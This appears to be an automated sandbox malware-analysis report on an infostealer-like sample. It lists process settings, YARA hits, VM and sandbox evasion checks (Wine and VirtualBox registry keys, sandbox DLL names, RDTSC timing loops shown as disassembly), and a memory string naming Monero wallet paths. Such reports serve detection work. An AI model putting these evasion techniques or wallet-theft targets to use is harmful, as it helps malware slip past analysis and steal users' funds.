Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: Yara match File source: 25.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.DSN_5xuwaC5nkP_MHzd7lLTl.exe.4295570.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.DSN_5xuwaC5nkP_MHzd7lLTl.exe.4295570.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.2613302475.0000000004295000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.3234197718.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: FileApp.exe PID: 1340, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: DSN_5xuwaC5nkP_MHzd7lLTl.exe PID: 7060, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Evasive API call chain: GetUserDefaultLangID, ExitProcess
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Evasive API call chain: GetPEB, DecisionNodes, Sleep
Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe Stalling execution: Execution stalls by calling Sleep
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: DSN_5xuwaC5nkP_MHzd7lLTl.exe, 0000000A.00000002.2613302475.0000000004295000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: INMPM20IXQUGN9:-?5(\C!7%{->^WALLET_PATHSOFTWARE\MONERO-PROJECT\MONERO-CORE.KEYS\MONERO\WALLET.KEYS\\\*.*\\...\\\\\\\\\\\\HAL9THJOHNDOEDISPLAYAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL16:28:0516:28:0516:28:0516:28:0516:28:0516:28:05DELAYS.TMP%S%SNTDLL.DLL
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10042EC second address: 1004315 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnc 00007F76E5036BC0h 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 101DFAF second address: 101DFB5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 101DFB5 second address: 101DFBA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 101DFBA second address: 101DFD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F76E5186DF9h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 101E145 second address: 101E180 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F76E5036BB4h 0x00000008 jmp 00007F76E5036BB8h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 pushad 0x00000011 jnp 00007F76E5036BA6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 101E180 second address: 101E186 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 101E47F second address: 101E483 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 101E629 second address: 101E62D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 101E94E second address: 101E97C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnc 00007F76E5036BA6h 0x0000000d pushad 0x0000000e popad 0x0000000f push esi 0x00000010 pop esi 0x00000011 popad 0x00000012 pop eax 0x00000013 pushad 0x00000014 pushad 0x00000015 jmp 00007F76E5036BB7h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 101E97C second address: 101E998 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F76E5186DF4h 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 102145A second address: 102145E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 102145E second address: 1021464 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1021464 second address: 102146A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 102146A second address: EA3B51 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F76E5186DE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e jmp 00007F76E5186DF3h 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 jmp 00007F76E5186DF4h 0x0000001c pop eax 0x0000001d cld 0x0000001e push dword ptr [ebp+122D06E1h] 0x00000024 mov dx, di 0x00000027 call dword ptr [ebp+122D219Bh] 0x0000002d pushad 0x0000002e jnc 00007F76E5186DE7h 0x00000034 xor eax, eax 0x00000036 pushad 0x00000037 xor esi, 7ABDAB1Ch 0x0000003d mov dx, di 0x00000040 popad 0x00000041 mov edx, dword ptr [esp+28h] 0x00000045 mov dword ptr [ebp+122D220Ch], edx 0x0000004b stc 0x0000004c mov dword ptr [ebp+122D2A9Bh], eax 0x00000052 mov dword ptr [ebp+122D292Ch], edx 0x00000058 mov esi, 0000003Ch 0x0000005d clc 0x0000005e or dword ptr [ebp+122D220Ch], ebx 0x00000064 add esi, dword ptr [esp+24h] 0x00000068 stc 0x00000069 lodsw 0x0000006b cld 0x0000006c add eax, dword ptr [esp+24h] 0x00000070 xor dword ptr [ebp+122D292Ch], esi 0x00000076 jmp 00007F76E5186DF4h 0x0000007b mov ebx, dword ptr [esp+24h] 0x0000007f mov dword ptr [ebp+122D292Ch], ecx 0x00000085 push eax 0x00000086 jbe 00007F76E5186DF8h 0x0000008c push eax 0x0000008d push edx 0x0000008e jno 00007F76E5186DE6h 0x00000094 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1021672 second address: 10216C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F76E5036BABh 0x00000010 nop 0x00000011 mov edi, dword ptr [ebp+122D2A4Fh] 0x00000017 push 00000000h 0x00000019 mov dword ptr [ebp+122D30BDh], edx 0x0000001f call 00007F76E5036BA9h 0x00000024 jmp 00007F76E5036BACh 0x00000029 push eax 0x0000002a jc 00007F76E5036BB2h 0x00000030 js 00007F76E5036BACh 0x00000036 mov eax, dword ptr [esp+04h] 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f popad 0x00000040 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10216C9 second address: 10216CF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10216CF second address: 102173F instructions: 0x00000000 rdtsc 0x00000002 jg 00007F76E5036BB7h 0x00000008 jmp 00007F76E5036BB1h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov eax, dword ptr [eax] 0x00000011 jmp 00007F76E5036BB7h 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a push eax 0x0000001b jnc 00007F76E5036BACh 0x00000021 pop eax 0x00000022 pop eax 0x00000023 movzx esi, bx 0x00000026 or esi, dword ptr [ebp+122D2D41h] 0x0000002c push 00000003h 0x0000002e xor dword ptr [ebp+122D2946h], edx 0x00000034 push 00000000h 0x00000036 movsx edx, si 0x00000039 push 00000003h 0x0000003b mov cl, ah 0x0000003d call 00007F76E5036BA9h 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 popad 0x00000048 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 102173F second address: 1021745 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1021745 second address: 1021761 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76E5036BB3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1021761 second address: 10217BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop eax 0x0000000b popad 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jmp 00007F76E5186DF8h 0x00000015 mov eax, dword ptr [eax] 0x00000017 ja 00007F76E5186DFCh 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 jmp 00007F76E5186DECh 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10217BC second address: 10217C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1021885 second address: 102188F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F76E5186DE6h 0x0000000a rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 102193E second address: 1021946 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 103FE1D second address: 103FE2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F76E5186DE6h 0x0000000a popad 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1040AE7 second address: 1040AEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1040AEB second address: 1040AEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 104160B second address: 104160F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 104160F second address: 1041621 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76E5186DEEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1041621 second address: 1041627 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1041627 second address: 1041631 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F76E5186DE6h 0x0000000a rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 104191E second address: 1041922 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1041922 second address: 1041945 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F76E5186DE6h 0x00000008 jmp 00007F76E5186DF9h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1041AD4 second address: 1041AF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F76E5036BB3h 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1041AF0 second address: 1041AF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1080200 second address: 1080207 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1080207 second address: 108020D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 108020D second address: 1080211 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10802E4 second address: EA3B51 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76E5036BB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jo 00007F76E5036BBAh 0x00000011 jmp 00007F76E5036BB4h 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a jbe 00007F76E5036BAEh 0x00000020 pop eax 0x00000021 stc 0x00000022 push dword ptr [ebp+122D06E1h] 0x00000028 clc 0x00000029 call dword ptr [ebp+122D219Bh] 0x0000002f pushad 0x00000030 jnc 00007F76E5036BA7h 0x00000036 xor eax, eax 0x00000038 pushad 0x00000039 xor esi, 7ABDAB1Ch 0x0000003f mov dx, di 0x00000042 popad 0x00000043 mov edx, dword ptr [esp+28h] 0x00000047 mov dword ptr [ebp+122D220Ch], edx 0x0000004d stc 0x0000004e mov dword ptr [ebp+122D2A9Bh], eax 0x00000054 mov dword ptr [ebp+122D292Ch], edx 0x0000005a mov esi, 0000003Ch 0x0000005f clc 0x00000060 or dword ptr [ebp+122D220Ch], ebx 0x00000066 add esi, dword ptr [esp+24h] 0x0000006a stc 0x0000006b lodsw 0x0000006d cld 0x0000006e add eax, dword ptr [esp+24h] 0x00000072 xor dword ptr [ebp+122D292Ch], esi 0x00000078 jmp 00007F76E5036BB4h 0x0000007d mov ebx, dword ptr [esp+24h] 0x00000081 mov dword ptr [ebp+122D292Ch], ecx 0x00000087 push eax 0x00000088 jbe 00007F76E5036BB8h 0x0000008e push eax 0x0000008f push edx 0x00000090 jno 00007F76E5036BA6h 0x00000096 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 1084249 second address: 1084262 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76E5186DF5h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10843C7 second address: 10843E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76E5036BB4h 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 10846C3 second address: 10846C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe RDTSC instruction interceptor: First address: 108499A second address: 10849A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
